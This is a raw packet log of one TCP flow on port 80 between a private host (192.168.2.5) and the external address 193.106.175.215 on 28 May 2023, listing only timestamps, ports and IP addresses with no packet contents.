May 28, 2023 09:29:41.736804008 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.736818075 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.736824989 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.736845016 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.736852884 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.736865044 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.736885071 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.736891985 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.736907005 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.736912012 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.736927032 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.736948013 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.736947060 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.736969948 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.736978054 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.736990929 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.737010956 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.737014055 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.737031937 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.737045050 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.737051010 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.737071991 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.737080097 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.737092972 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.737112045 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.737112999 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.737134933 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.737134933 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.737155914 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.737165928 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.737190008 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.801292896 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.801331997 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.801351070 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.801364899 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.801383972 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.801404953 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.801424980 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.801444054 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.801464081 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.801469088 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.801485062 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.801505089 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.801517963 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.801527023 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.801537037 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.801547050 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.801567078 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.801568985 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.801588058 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.801598072 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.801609039 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.801626921 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.801630020 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.801652908 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.801656008 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.801673889 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.801683903 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.801696062 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.801704884 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.801717043 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.801731110 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.801738977 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.801740885 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.801758051 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.801760912 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.801780939 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.801784039 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.801798105 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.801805973 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.801821947 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.801826954 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.801843882 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.801848888 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.801865101 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.801871061 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.801886082 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.801892042 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.801908016 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.801913023 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.801928997 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.801934004 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.801948071 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.801954985 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.801970959 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.801975965 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.801990032 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.801996946 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.802012920 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.802017927 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.802032948 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.802037954 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.802052021 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.802059889 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.802078009 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.802081108 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.802100897 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.802103996 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.802115917 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.802125931 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.802139997 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.802145958 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.802161932 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.802166939 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.802182913 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.802189112 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.802203894 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.802211046 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.802223921 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.802232027 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.802247047 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.802252054 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.802267075 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.802273989 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.802289009 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.802294970 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.802309990 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.802315950 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.802331924 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.802336931 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.802351952 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.802357912 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.802378893 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.802378893 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.802396059 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.802406073 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.802421093 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.802428007 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.802448988 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.802448988 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.802464962 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.802470922 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.802486897 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.802493095 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.802508116 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.802514076 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.802535057 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.802535057 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.802550077 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.802558899 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.802576065 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.802582026 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.802597046 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.802603006 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.802624941 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.802628040 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.802647114 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.802649021 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.802661896 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.802668095 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.802686930 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.802689075 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.802706003 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.802710056 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.802726984 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.802731991 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.802747011 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.802753925 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.802769899 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.802774906 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.802793026 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.802798033 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.802818060 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.802819014 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.802839041 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.802841902 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.802855015 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.802860022 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.802876949 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.802881956 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.802898884 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.802903891 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.802920103 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.802925110 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.802944899 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.802947998 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.802968979 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.802970886 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.802989006 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.802994967 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.803009987 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.803016901 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.803031921 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.803036928 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.803054094 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.803057909 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.803075075 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.803076982 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.803096056 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.803097010 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.803117990 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.803117990 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.803138018 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.803141117 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.803158998 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.803160906 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.803178072 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.803181887 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.803204060 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.803208113 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.803220034 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.803224087 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.803245068 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.803246975 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.803266048 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.803267956 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.803287983 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.803287029 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.803307056 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.803311110 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.803327084 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.803333044 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.803350925 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.803354025 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.803370953 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.803376913 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.803394079 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.803397894 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.803416014 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.803420067 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.803435087 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.803440094 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.803457022 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.803461075 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.803477049 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.803483009 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.803498983 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.803503990 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.803518057 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.803525925 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.803543091 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.803545952 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.803565025 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.803566933 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.803586006 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.803586006 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.803601980 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.803606987 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.803623915 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.803630114 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.803643942 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.803653002 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.803667068 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.803672075 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.803689957 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.803694010 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.803711891 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.803718090 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.803731918 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.803739071 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.803755999 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.803760052 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.803776979 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.803782940 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.803797007 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.803803921 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.803819895 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.803826094 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.803845882 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.803848982 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.803864002 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.803867102 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.803884983 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.803886890 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.803904057 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.803910017 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.803929090 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.803930044 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.803946972 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.803951979 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.803967953 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.803972960 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.803988934 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.803994894 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.804008007 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.804014921 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.804033995 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.804037094 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.804052114 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.804059029 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.804074049 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.804079056 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.804095030 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.804100990 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.804112911 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.804121017 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.804136992 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.804142952 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.804160118 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.804166079 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.804181099 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.804186106 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.804202080 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.804207087 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.804220915 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.804228067 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.804243088 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.804248095 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.804275990 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.804287910 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.804297924 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.804318905 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.804335117 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.804339886 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.804358006 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.804362059 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.804378033 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.804383039 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.804399014 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.804404020 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.804420948 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.804425955 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.804441929 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.804446936 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.804466963 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.804467916 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.804486990 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.804490089 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.804507017 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.804512024 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.804527044 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.804533958 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.804548025 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.804554939 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.804573059 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.804574966 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.804595947 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.804596901 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.804617882 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.804620028 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.804639101 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.804640055 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.804657936 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.804661036 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.804677010 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.804682016 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.804697990 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.804706097 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.804718971 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.804728031 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.804749012 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.804761887 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.868170023 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.868204117 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.868222952 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.868303061 CEST	80	49715	193.106.175.215	192.168.2.5
May 28, 2023 09:29:41.868330002 CEST	49715	80	192.168.2.5	193.106.175.215
May 28, 2023 09:29:41.868335009 CEST	80	49715	193.106.175.215	192.168.2.5
